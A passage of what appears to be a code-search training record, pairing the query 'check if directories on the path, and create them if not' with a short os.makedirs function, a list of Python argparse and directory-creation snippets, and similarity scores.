arguments!\\n\")\n sys.stdout.flush()\n usage(error=True)\n\n # external modules rely on non-empty argv array, \n # re-append the script name as first command line argument\n sys.argv.append(scriptname)\n return (id_cmd, ncl_cmd, quali_cmd)", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Run NCF..\")\n parser.add_argument(\n \"--config_file\",\n nargs=\"?\",\n type=str,\n default=\"../configs/ncf_default.json\",\n help=\"Specify the config file name. Only accept a file from ../configs/\",\n )\n # If the following settings are specified with command line,\n # These settings will used to update the parameters received from the config file.\n parser.add_argument(\n \"--dataset\",\n nargs=\"?\",\n type=str,\n help=\"Options are: tafeng, dunnhunmby and instacart\",\n )\n parser.add_argument(\n \"--data_split\",\n nargs=\"?\",\n type=str,\n help=\"Options are: leave_one_out and temporal\",\n )\n parser.add_argument(\n \"--root_dir\", nargs=\"?\", type=str, help=\"working directory\",\n )\n parser.add_argument(\n \"--emb_dim\", nargs=\"?\", type=int, help=\"Dimension of the embedding.\"\n )\n parser.add_argument(\"--lr\", nargs=\"?\", type=float, help=\"Intial learning rate.\")\n parser.add_argument(\"--max_epoch\", nargs=\"?\", type=int, help=\"Number of max epoch.\")\n parser.add_argument(\n \"--batch_size\", nargs=\"?\", type=int, help=\"Batch size for training.\"\n )\n parser.add_argument(\"--optimizer\", nargs=\"?\", type=str, help=\"OPTI\")\n parser.add_argument(\"--activator\", nargs=\"?\", type=str, help=\"activator\")\n parser.add_argument(\"--alpha\", nargs=\"?\", type=float, help=\"ALPHA\")\n return parser.parse_args()", "def parse_args():\n parser = ArgumentParser(\n description=\"This is a script for auto apply ipex optimization.\"\n \"\\n################################# Basic usage ############################# \\n\"\n \"\\n 1. Apply ipex optimization with fp32 data type\\n\"\n \"\\n >>> python -m intel_extension_for_pytorch.cpu.auto_ipex python_script args \\n\"\n \"\\n 2. Apply ipex optimization with bf16 data type\\n\"\n \"\\n >>> python -m intel_extension_for_pytorch.cpu.auto_ipex --dtype bfloat16 python_script args \\n\",\n formatter_class=RawTextHelpFormatter,\n )\n\n add_auto_ipex_params(parser, auto_ipex_default_enabled=True)\n\n # positional\n parser.add_argument(\n \"program\",\n type=str,\n help=\"The full path to the proram/script to be launched. 
\"\n \"followed by all the arguments for the script\",\n )\n # rest from the training program\n parser.add_argument(\"program_args\", nargs=REMAINDER)\n return parser.parse_args()", "def parse(self, args):\n pass", "def _parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n #parser.add_argument(\"args\", metavar=\"N\", type=str, nargs=\"*\", help=\"Positional arguments.\")\n #parser.add_argument(\"\", dest=\"\", type=\"\", default=, help=)\n #parser.add_argument(\"--version\", action=\"version\", version=\"<the version>\")\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(\n description=\"script for downloading and merging log files from S3 for particular time period\")\n parser.add_argument(\"-s\", \n \"--startdate\", \n help=\"start date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-e\", \"--enddate\", \n help=\"end date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-f\", \n \"--file\", \n help=\"destination file\", \n required=True)\n parser.add_argument( \"-c\", \"--config\",\n default=\"/Users/samarius/.get_analytics_log.config.json\",\n help=\"configuration file path\")\n\n\n try:\n args = parser.parse_args()\n return args\n except Exception as e:\n print \"can't parse command line args: {}\".format(repr(e))\n raise", "def parseCommandLine():\n\n parser = argparse.ArgumentParser(\n description='Determine photometric zeropoint of banzai-reduced LCO imaging data.')\n\n\n parser.add_argument('--log-level', dest='log_level', default='INFO', choices=['DEBUG', 'INFO'],\n help='Set the log level')\n parser.add_argument('--ps1dir', dest='ps1dir', default='~/Catalogs/ps1odi/panstarrs/',\n help='Directory of PS1 catalog')\n parser.add_argument(\"--diagnosticplotsdir\", dest='outputimageRootDir', default=None,\n help='Output directory for diagnostic photometry plots. No plots generated if option is omitted. This is a time consuming task. ')\n parser.add_argument('--photodb', dest='imagedbPrefix', default='~/lcozpplots/lcophotzp.db',\n help='Result output directory. .db file is written here')\n parser.add_argument('--imagerootdir', dest='rootdir', default='/archive/engineering',\n help=\"LCO archive root directory\")\n parser.add_argument('--site', dest='site', default=None, help='sites code for camera')\n parser.add_argument('--mintexp', dest='mintexp', default=60, type=float, help='Minimum exposure time to accept')\n parser.add_argument('--redo', action='store_true')\n parser.add_argument ('--preview', dest='processstatus', default='processed', action='store_const', const='preview')\n\n\n\n mutex = parser.add_mutually_exclusive_group()\n mutex.add_argument('--date', dest='date', default=[None,], nargs='+', help='Specific date to process.')\n mutex.add_argument('--lastNdays', type=int)\n\n\n cameragroup = parser.add_mutually_exclusive_group()\n\n cameragroup.add_argument('--camera', dest='camera', default=None, help='specific camera to process. ')\n cameragroup.add_argument('--cameratype', dest='cameratype', default=None, choices=['fs', 'fl', 'kb'],\n help='camera type to process at selected sites to process. 
')\n cameragroup.add_argument('--crawldirectory', default=None, type=str,\n help=\"process all reduced image in specific directoy\")\n\n args = parser.parse_args()\n\n logging.basicConfig(level=getattr(logging, args.log_level.upper()),\n format='%(asctime)s.%(msecs).03d %(levelname)7s: %(module)20s: %(message)s')\n\n args.imagedbPrefix = os.path.expanduser(args.imagedbPrefix)\n\n if args.outputimageRootDir is not None:\n args.outputimageRootDir = os.path.expanduser(args.outputimageRootDir)\n print (\"Writing db to directory: %s\" % args.outputimageRootDir)\n\n if args.crawldirectory is not None:\n args.crawldirectory = os.path.expanduser(args.crawldirectory)\n\n\n\n if (args.lastNdays is not None):\n args.date=[]\n today = datetime.datetime.utcnow()\n for ii in range (args.lastNdays):\n day = today - datetime.timedelta(days=ii)\n args.date.append (day.strftime(\"%Y%m%d\"))\n\n args.date = args.date[::-1]\n\n args.ps1dir = os.path.expanduser(args.ps1dir)\n\n print (args.processstatus)\n return args", "def parse_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"生成用户字符串识别的切分字符串\"\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"output/\"\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\",\n required=True\n )\n parser.add_argument(\n \"-mi\",\n \"--min_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The minimum number of characters per line, Default is 3.\",\n default=3,\n\n )\n parser.add_argument(\n \"-ma\",\n \"--max_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The maximum number of characters per line, Default is 20.\",\n default=20,\n )\n return parser.parse_args()", "def parse_args():\n parser = common_parser()\n parser.description = (\n \"Given a sequence dict, fasta index or a bed file, scatter over the \"\n \"defined contigs/regions. Each contig/region will be split into \"\n \"multiple overlapping regions, which will be written to a new bed \"\n \"file. Each contig will be placed in a new file, unless the length of \"\n \"the contigs/regions doesn't exceed a given number.\")\n\n parser.add_argument(\"-c\", \"--chunk-size\", type=int, default=1e6,\n metavar=\"SIZE\",\n help=\"The size of the chunks. The first chunk in a \"\n \"region or contig will be exactly length SIZE, \"\n \"subsequent chunks will SIZE + OVERLAP and the final \"\n \"chunk may be anywhere from 0.5 to 1.5 times SIZE \"\n \"plus overlap. If a region (or contig) is smaller \"\n \"than SIZE the original regions will be returned. \"\n \"Defaults to 1e6\")\n parser.add_argument(\"-m\", \"--minimum-bp-per-file\", type=int, default=45e6,\n help=\"The minimum number of bases represented within \"\n \"a single output bed file. If an input contig or \"\n \"region is smaller than this MINIMUM_BP_PER_FILE, \"\n \"then the next contigs/regions will be placed in the \"\n \"same file untill this minimum is met. Defaults to \"\n \"45e6.\")\n parser.add_argument(\"-o\", \"--overlap\", type=int, default=150,\n help=\"The number of bases which each chunk should \"\n \"overlap with the preceding one. 
Defaults to 150.\")\n parser.add_argument(\"-S\", \"--split-contigs\", action=\"store_true\",\n help=\"If set, contigs are allowed to be split up over \"\n \"multiple files.\")\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-e\", \"--events\", type=str,\n help=\"path to events CSV-file\")\n parser.add_argument(\"-d\", \"--data\", type=str,\n help=\"path to data CSV-file\")\n parser.add_argument(\"-l\", \"--limit\", nargs='?', type=int, default=None,\n help=\"max records to be processed\")\n parser.add_argument(\"-t\", \"--timezone\", nargs='?', type=int, default=5,\n help=\"date and time shift\")\n parser.add_argument(\"-o\", \"--optimized\", action='store_true',\n help=\"if specified, then data CSV will be processed\"\n \" by small chunks to escape memory issues\")\n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n parser.add_argument(\"--output-folder\", nargs='?', type=str,\n default=\"linked\")\n return vars(parser.parse_args())", "def parse_args():\n parser = default_argument_parser()\n parser.add_argument(\"--label-map\",\n dest=\"label_map\",\n type=pathlib.Path,\n help=\"Label map in YAML format which maps from category \"\n \"ID to name.\")\n parser.add_argument(\"--train-csv\",\n dest=\"train_csv\",\n required=True,\n type=pathlib.Path,\n help=\"Path to training data CSV file.\")\n parser.add_argument(\"--valid-csv\",\n dest=\"valid_csv\",\n required=False,\n type=pathlib.Path,\n help=\"Optional path to validation data CSV file.\")\n parser.add_argument(\n \"--image-width\",\n type=int,\n help=\"Image width (optional, used to speed up dataset processing).\")\n parser.add_argument(\n \"--image-height\",\n type=int,\n help=\"Image height (optional, used to speed up dataset processing).\")\n return parser.parse_args()", "def parse_args():\n from argparse import ArgumentParser\n ap = ArgumentParser(prog='dax_launch', description=__description__)\n ap.add_argument(dest='settings_path', help='Settings Path')\n ap.add_argument('--logfile', dest='logfile',\n help='Logs file path if needed.', default=None)\n _help = 'Project ID from XNAT to run dax_update on locally (only one \\\nproject).'\n ap.add_argument('--project', dest='project', help=_help, default=None)\n _help = 'list of sessions label from XNAT to run dax_launch on locally.'\n ap.add_argument('--sessions', dest='sessions', help=_help, default=None)\n ap.add_argument('--writeonly', dest='writeonly', action='store_true',\n help='Only write job files without launching them.')\n _help = 'Folder to store the PBS when using --writeonly. 
Default: \\\nRESULTS_DIR/TRASH.'\n ap.add_argument('--pbsfolder', dest='pbsfolder', help=_help, default=None)\n ap.add_argument('--nodebug', dest='debug', action='store_false',\n help='Avoid printing DEBUG information.')\n ap.add_argument('--no_qsub', dest='no_qsub', action='store_true',\n help='Run the jobs locally on your computer in serial.')\n return ap.parse_args()", "def parseArguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_folder',\n help='Path of the folder where output files should be written.')\n parser.add_argument('--partition_id',\n help='ID of the computer partition to collect data from.')\n parser.add_argument('--collector_db',\n help='The path of slapos collect database.')\n\n return parser.parse_args()", "def _parse_args(self, argv: List[str]):\n if sys.version_info >= (3, 0):\n parser = ArgumentParser(allow_abbrev=False)\n else:\n parser = ArgumentParser()\n\n parser.add_argument(\"--accesskey\", \"--access-key\", help=_ACCESS_KEY_HELP)\n parser.add_argument(\"--workspace_id\", help=_WORKSPACE_ID_HELP)\n parser.add_argument(\"--tenant_id\", help=_TENANT_ID_HELP)\n parser.add_argument(\"--url\", help=_URL_HELP)\n parser.add_argument(\"--gateway_url\", help=_GATEWAY_URL_HELP)\n parser.add_argument(\"--aad\", action=\"store_true\", help=_AAD_HELP)\n parser.add_argument(\"--verbose\", action=\"store_true\", help=_VERBOSE_HELP)\n parser.add_argument(\n \"--performance\", action=\"store_true\", help=_PERFORMANCE_HELP\n )\n parser.add_argument(\"--log\", nargs=\"+\", help=_LOG_HELP)\n parser.add_argument(\"--record\", nargs=1, default=None, help=_RECORD_HELP)\n\n args, remainder = parser.parse_known_args(argv[1:])\n\n if args.aad:\n self.use_aad = args.aad\n\n if args.accesskey is not None:\n self.accesskey = args.accesskey\n\n if args.workspace_id is not None:\n self.workspace_id = args.workspace_id\n\n if args.tenant_id is not None:\n self.tenant_id = args.tenant_id\n\n if args.url is not None:\n self.url = args.url\n\n if args.gateway_url is not None:\n self.gateway_url = args.url\n\n if args.verbose:\n self.verbose = args.verbose\n log.set_enable_all(args.verbose)\n\n if args.performance:\n # logging::log().set_enabled(true);\n # logging::log().set_enable_all_perf(true);\n pass\n\n if args.log is not None:\n for domain in args.log:\n log.set_enabled(domain)\n\n if args.record:\n self.record_file = args.record[0]\n self.record_enabled = True\n\n if remainder is not None:\n pass", "def parseArgs ():\n independentBaseName = None\n dependentBaseName = None\n independentTSID = None\n dependentTSID = None\n statisticsFile = None\n nEquations = None\n logFile = None\n #\n # Loop through command line arguments\n for arg in sys.argv:\n parts = arg.split('=')\n if ( (parts == None) or (len(parts) != 2) ):\n # Not an arg=value command line argument\n continue\n argName = parts[0].upper()\n argValue = parts[1]\n if ( argName == 'DEPENDENTBASENAME' ):\n dependentBaseName = argValue\n elif ( argName == 'DEPENDENTTSID' ):\n dependentTSID = argValue\n elif ( argName == 'INDEPENDENTBASENAME' ):\n independentBaseName = argValue\n elif ( argName == 'INDEPENDENTTSID' ):\n independentTSID = argValue\n elif ( argName == 'LOGFILE' ):\n logFile = argValue\n elif ( argName == 'NUMBEROFEQUATIONS' ):\n nEquations = int(argValue)\n elif ( argName == 'STATISTICSFILE' ):\n statisticsFile = argValue\n return ( independentBaseName, dependentBaseName, independentTSID, dependentTSID,\n statisticsFile, nEquations, logFile )", "def parse_arguments():\n parser = 
argparse.ArgumentParser(description='Helps analyze articles.')\n parser.add_argument('--config', default='config.yaml',\n help='Configuration file for the options of this script')\n parser.add_argument('--search', default=None, type=str,\n help='Search for text in the articles')\n parser.add_argument('--case-sensitive', action='store_true',\n help='Makes search case-senstive (only applicatble to --search)')\n parser.add_argument('--list', default=None, type=str,\n help='List [title|authors|date|word-count|author|excerpt|content] of the articles')\n parser.add_argument('--sort', action='store_true',\n help='Sorts output (only applicable to --list).')\n parser.add_argument('--sort-by', default=None, type=str,\n help='Sorts output by another attribute [title|author|date] (only applicable to --list)')\n parser.add_argument('--statistics', action='store_true',\n help='Gives basic statistics about the articles.')\n parser.add_argument('--count-articles', action='store_true',\n help='Counts the total number of articles')\n parser.add_argument('--count-words', action='store_true',\n help='Counts the total number of words')\n parser.add_argument('--count-paragraphs', action='store_true',\n help='Counts the total number of paragraphs')\n parser.add_argument('--count-by-author', action='store_true',\n help='Counts the number of articles by each author')\n parser.add_argument('--count-by-year', action='store_true',\n help='Counts the number of articles bucketed by year')\n parser.add_argument('--count-by-months', default=None, type=int,\n help='Counts the number of articles bucketed by number of months')\n \n return parser, parser.parse_args()", "def _parse_cli_opts(self, args):\n self._args = args\n for opt, group in self._all_cli_opts():\n opt._add_to_cli(self._oparser, group)\n\n return self._parse_config_files()", "def parse_arguments(args=sys.argv[1:]):\n \n parser = argparse.ArgumentParser()\n \n parser.add_argument('-i', '--input',\n help=\"Path of input file to read. Default: {d}\".format(d=INPUT_FILE),\n default=INPUT_FILE)\n \n return parser.parse_args(args)", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--version',\n metavar=\"<str>\",\n help=\"Input data version number\",\n type=str,\n required=True\n )\n args = parser.parse_args()\n return args", "def prepare_arguments(self, parser):\n pass" ]
[ "0.7812506", "0.7636276", "0.7270536", "0.720011", "0.71367455", "0.712731", "0.6990735", "0.6976223", "0.69415474", "0.6897431", "0.6839291", "0.68086874", "0.67994547", "0.67840666", "0.6775619", "0.67488694", "0.6741559", "0.6727123", "0.67215323", "0.67038643", "0.6699622", "0.6695919", "0.6695863", "0.6676773", "0.6675058", "0.66583896", "0.6646412", "0.66148144", "0.6613735", "0.6605347", "0.66045964", "0.65927714", "0.6586825", "0.65851", "0.658443", "0.657775", "0.6576862", "0.65677243", "0.6566156", "0.6559208", "0.6552457", "0.65471655", "0.65442044", "0.65365887", "0.65312624", "0.6522934", "0.65219563", "0.6513623", "0.6510889", "0.6507839", "0.6504214", "0.6503864", "0.65007937", "0.64974546", "0.6487267", "0.6487098", "0.6485572", "0.6484834", "0.6480681", "0.6480384", "0.6477869", "0.6476365", "0.64704823", "0.64659965", "0.64472675", "0.6442889", "0.6438298", "0.6435837", "0.64357597", "0.6428384", "0.6420766", "0.64182", "0.64180195", "0.6416107", "0.64159656", "0.6414199", "0.64126444", "0.64072067", "0.6400285", "0.6391304", "0.63893265", "0.6381673", "0.63796765", "0.6377731", "0.6374172", "0.6372907", "0.63725466", "0.63721657", "0.6367823", "0.63672924", "0.63654506", "0.6358865", "0.6353488", "0.6350645", "0.63481206", "0.63479114", "0.6346968", "0.6341899", "0.6329404", "0.63290626", "0.6327186" ]
0.0
-1
Check if directories on the path, and create them if not.
def check_dir(path): if not os.path.exists(path): os.makedirs(path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _check_path(path):\n os.system(\"if [ ! -d \" + path + \" ]; then mkdir -p \" + path + \"; fi\")", "def _check_dirs(self):\r\n for dir in [self.papers_dir,\r\n self.buffer_dir]:\r\n if not os.path.exists(dir):\r\n message = f'Dir not exists: {dir}. Making it.'\r\n logging.warning(message)\r\n os.mkdir(dir)", "def create_dir_if_necessary(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise", "def ensure_dirs_exist(path):\n os.makedirs(path, exist_ok=True)", "def make_dirs(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def checkDirectory(path,logger):\n newPath = completePath(path)\n if not os.path.exists(newPath):\n os.makedirs(newPath)\n if (logger):\n print(\"Did not found required directories. Creating them...\")\n else:\n if (logger):\n print(\"Found the required directories!\")", "def make_dirs(path):\n\tif not os.path.exists(path):\n\t\treturn os.makedirs(path)", "def checkExistenceDir(path):\n path = os.path.abspath(path)\n if not os.path.isdir(path):\n logger.warning(\n \"Directory {} does not seem to exist, creating one.\".format(path)\n )\n os.mkdir(path)", "def _mkdir_if_not_exist(path):\n if not(os.path.isdir(path)):\n os.mkdir(path)\n else:\n _logger.info('Skipping existing directory %s' % path)", "def ensure_folders_if(path, condition=True):\n if not os.path.exists(path) and condition:\n os.makedirs(path)", "def _ensure_dirs(dirpath):\n if not os.path.isdir(dirpath):\n if os.path.exists(dirpath):\n err = \"log path ({}) exists but is not a directory\"\n raise ConfigError(err.format(dirpath))\n os.makedirs(dirpath, 0o777)", "def check_path(dir_path):\n if not os.path.exists(dir_path):\n os.mkdir(dir_path, 0755)", "def make_dirs_or_not(dirpath: Union[PathOrStrType]):\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)", "def create_directories(path):\n try:\n os.makedirs(path)\n\n except OSError as e:\n\n if e.errno != errno.EEXIST:\n logging.error(str(e))\n raise", "def mkdir_if_not_exists(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def create_folder_if_needed(path):\n if os.path.exists(path):\n print(\"{} dir exists\".format(path))\n else:\n print(\"{} dir does not exist. 
Creating dir.\".format(path))\n os.mkdir(path)", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else: raise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\r\n try:\r\n os.makedirs(path)\r\n except OSError as exc: # Python >2.5\r\n if exc.errno == errno.EEXIST and os.path.isdir(path):\r\n pass\r\n else:\r\n raise", "def makedirectory(path):\n\n exist_ok = True\n if not exist_ok and os.path.isdir(path):\n with contextlib.suppress(OSError):\n Path.mkdir(path, parents=True)", "def exist_ok_makedirs (path, mode=0777):\n if not os.path.isdir (path):\n head, tail = os.path.split (path)\n if not tail:\n head, tail = os.path.split (head)\n if head and tail:\n exist_ok_makedirs (head, mode)\n exist_ok_mkdir (path, mode)", "def ensure_dir_exists(path: Union[str,Path]) -> None:\n# path = str(path)\n assert not os.path.isfile(path)\n os.makedirs(path, exist_ok=True)\n assert os.path.isdir(path)", "def mkdirs(path):\n\tif not os.path.exists(path):\n\t\tos.makedirs(path)", "def mkdir_p(self, path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def make_dir_if_needed(path):\n\n if not os.path.exists(path):\n os.makedirs(path)\n return path", "def assure_path_exists(self, path):\n\n dir = os.path.dirname(path)\n if not os.path.exists(dir):\n os.makedirs(dir)", "def make_directories(file_path):\n logger.info(\"Create all directories in the path %s\", file_path)\n if not os.path.exists(file_path):\n os.makedirs(file_path, exist_ok=True)\n else:\n logger.warning(\"Cannot create directories %s. 
The directory already exists\", file_path)", "def EnsureDirExists(path):\n try:\n os.makedirs(os.path.dirname(path))\n except OSError:\n pass", "def check_dir(path):\n \n if not os.path.exists(path):\n os.makedirs(path)\n print path", "def ensure_dir(root, path):\n full_path = root\n for seg in path.split(os.sep):\n full_path += os.sep + seg\n if os.path.exists(full_path):\n if not os.path.isdir(full_path):\n raise ValueError(\"'{}' is not a directory\".format(full_path))\n else:\n os.makedirs(full_path)", "def maybe_make_dir(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError, e:\n if e.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def ensure_dir_exists(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def build_dirs(self, path):\n if not os.path.exists(path):\n os.makedirs(path)\n return path", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\n\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def mkdir_p(path):\n # http://stackoverflow.com/questions/600268/mkdir-p-functionality-in-python\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def ensure_directory_exists(path):\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.makedirs(directory, exist_ok=True)\n return", "def ensure_directory(path):\n\tdir_path = os.path.dirname(path)\n\tif os.path.exists(dir_path):\n\t\treturn\n\tensure_directory(dir_path)\n\ttry:\n\t\tos.mkdir(dir_path)\n\texcept OSError as e:\n\t\t# Ignore if EEXISTS. 
This is needed to avoid a race if two getters run at once.\n\t\tif e.errno != errno.EEXIST:\n\t\t\traise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise", "def ensure_dirpath_exists(path: Path) -> Path:\n assert path\n out_path: Path = path\n\n if not out_path.exists():\n out_path.mkdir(parents=True, exist_ok=True)\n\n return out_path", "def make_sure_path_exists(input_path: Union[Path, str], isfile: bool = False):\n input_path = Path(input_path)\n\n if isfile:\n directory = input_path.parent\n else:\n directory = input_path\n\n if directory.exists():\n return\n else:\n directory.mkdir(parents=True)", "def make_dir(path):\n if os.path.exists(path):\n return False\n else:\n os.makedirs(path, exist_ok=True)\n return True", "def _mkdir_p(path):\n if not osp.exists(path):\n os.makedirs(path)", "def makeDirs(self, inPath):\n\n if not os.path.exists(inPath): os.mkdir(inPath)", "def MakeDir(path):\n if os.path.exists(path):\n return False\n else:\n os.makedirs(path)\n return True", "def make_dirs(dirpath, debug=False):\n\tif not os.path.exists(dirpath):\n\t\ttry:\n\t\t\tos.mkdir(dirpath)\n\t\texcept OSError as e:\n\t\t\tif debug:\n\t\t\t\tprint(e)\n\t\t\t(head, tail) = os.path.split(dirpath)\n\t\t\tif '/' not in head or os.path.exists(head):\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tif(make_dirs(head)):\n\t\t\t\t\treturn make_dirs(dirpath)\n\treturn dirpath", "def check_path(path, verbose = False):\n if (not os.path.isdir(path)):\n if (verbose):\n log(LogType.SERVICE, 'No ' + path + '. Creating. . .')\n os.mkdir(path, 0o777)", "def mkdir_if_not_exist(path): #@save\n if not isinstance(path, str):\n path = os.path.join(*path)\n if not os.path.exists(path):\n os.makedirs(path)", "def makeDir(path):\r\n\r\n try:\r\n os.makedirs(path)\r\n except OSError as exc:\r\n if exc.errno == errno.EEXIST and os.path.isdir(path):\r\n pass\r\n else:\r\n raise", "def checkfolder(paths):\n\tpaths = paths if isinstance(paths, list) else [paths]\n\t\n\tdef creat_dir(x):\n\t\tx = Path(x)\n\t\tif x.is_dir():\n\t\t\tprint(f\"Dir {x} already exists\")\n\t\telse:\n\t\t\tPath.mkdir(x)\n\t\t\tprint(f\"Created new dir {x}\")\n\t\n\tlist(map(creat_dir, paths))", "def __make_dirs(path, mode=0o777):\n\n try:\n os.makedirs(path, mode=mode)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise Ai1wmError('error creating a directory: {}, error: {}'.format(path, e))\n return path", "def ensure_dir(path):\n parent = os.path.dirname(path)\n if not os.path.exists(parent):\n os.makedirs(parent)", "def mkdir_p(path):\n try:\n os.makedirs(path) # , exist_ok=True\n except OSError:\n pass", "def ensuredir(path):\n # Copied from sphinx.util.osutil.ensuredir(): BSD licensed code, so it's OK\n # to add to this project.\n EEXIST = getattr(errno, 'EEXIST', 0)\n try:\n os.makedirs(path)\n except OSError as err:\n # 0 for Jython/Win32\n if err.errno not in [0, EEXIST]:\n raise", "def makedir(path):\n try:\n os.makedirs(path)\n except OSError:\n # Path already exists or cannot be created\n if not os.path.isdir(path):\n raise", "def ensure_dir(path):\n\n \n try:\n os.makedirs(path)\n except (EnvironmentError) as e:\n if not(e.errno == errno.EEXIST and \n e.filename == path):\n raise\n return", "def mkdir(path):\n\tif not Path(path).exists():\n\t\tPath(path).mkdir(parents=True, exist_ok=True)", "def dir_exists(directories_path):\n if type(directories_path) is not list:\n directories_path = [directories_path]\n\n for directory in 
directories_path:\n if not exists(directory):\n makedirs(directory)\n print(constants.C_WARNING, 'Created directory:', directory, constants.C_ENDC)", "def create_dir_if_doesnt_exist(dir_path):\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n return", "def create_path(self, path):\n path_list = path.split(\"/\")\n done_path = self.parent_folder + \"/\"\n\n for directory in path_list:\n try:\n os.mkdir(done_path + directory + \"/\")\n except FileExistsError:\n done_path += directory + \"/\"", "def check_dir(path, create = True):\n if os.path.exists(path):\n if os.path.isdir(path):\n return path\n else:\n return False\n if create:\n msg = \"Creating directory: '%s'\" % (path)\n print msg\n log.info(msg)\n os.mkdir(path)\n else:\n return False", "def createFoldersFromPath(path):\n create = dirname(realpath(path))\n if not os.path.exists(create):\n os.makedirs(create)", "def prepare_dir(path, empty=False):\n\n def create_dir(path):\n \"\"\"\n Creates a directory\n :param path: string\n :return: nothing\n \"\"\"\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n if not os.path.exists(path):\n create_dir(path)", "def MaybeMakeDirectory(*path):\n file_path = os.path.join(*path)\n try:\n os.makedirs(file_path)\n except OSError, e:\n if e.errno != errno.EEXIST:\n raise", "def _check_is_dir(self, path):\n if os.path.isdir(path) and os.path.exists(path):\n self.__save_dir = path\n else:\n print(f'No existing directory found. Creating new directory at {path}')\n os.mkdir(path)\n self.__save_dir = path", "def ensure_dir(path: str):\n\n d = os.path.dirname(path)\n if not os.path.exists(d):\n os.makedirs(d)", "def maybe_makedirs(path_to_create):\n try: \n os.makedirs(path_to_create)\n except OSError:\n if not os.path.isdir(path_to_create):\n raise", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST:\n pass\n else: raise", "def safe_mkdirs(path):\n if not os.path.exists(path):\n try:\n os.makedirs(path)\n except Exception as e:\n raise IOError(\n (\"Failed to create recursive directories: \"\n \" {}\".format(path)\n )\n )", "def dirCheck(dirPath):\n if not os.path.exists(dirPath):\n os.mkdir(dirPath)\n return dirPath", "def direxists(ipath):\n if not ipath.endswith(\"/\"):\n ipath = ipath + \"/\"\n if not os.path.exists(ipath):\n try:\n os.mkdir(ipath)\n except os.error:\n logging.error(\"Can't create directory %s!\", ipath)\n else:\n if not os.access(os.path.dirname(ipath), os.W_OK):\n logging.error(\"Can't write to directory %s! 
Check permissions.\", ipath)\n return False\n return True", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST:\n pass\n else:\n raise", "def mkdir_if_notexists(path):\n try:\n os.mkdir(path)\n except FileExistsError:\n pass", "def mkdir(path):\n try: \n os.mkdir(path)\n except OSError:\n if not os.path.isdir(path):\n raise", "def safe_mkdir(path):\n # avoid race condition\n while True:\n try:\n if os.path.isdir(path):\n return\n os.makedirs(path)\n break\n except FileExistsError:\n sleep(0.1)", "def checking_path():\n path = Path(\"phonebook\")\n try:\n path.mkdir(parents=True, exist_ok=False)\n except FileExistsError:\n pass\n else:\n pass", "def create_directories(path):\n directories = ['images', 'pdf', 'videos', 'audio', 'spreedsheet', 'text', 'scripts', 'docs', 'other']\n for directory in directories:\n create_directory(path, directory)", "def mkdir_p(path):\n\n if os.path.exists(path):\n return\n\n par = os.path.split(path)[0]\n if os.path.exists(par):\n os.mkdir(path)\n getLogger(__name__).debug('created directory: %s' % path)\n else:\n mkdir_p(par)\n os.mkdir(path)", "def make_dir_if_need(path):\n folder, filename, ext = split_path(path)\n if len(folder) > 0 and not os.path.exists(folder):\n try:\n os.makedirs(folder)\n except Exception as e:\n print(e)\n sys.stderr.write('folder:{0} is not valid path'.format(folder))\n return 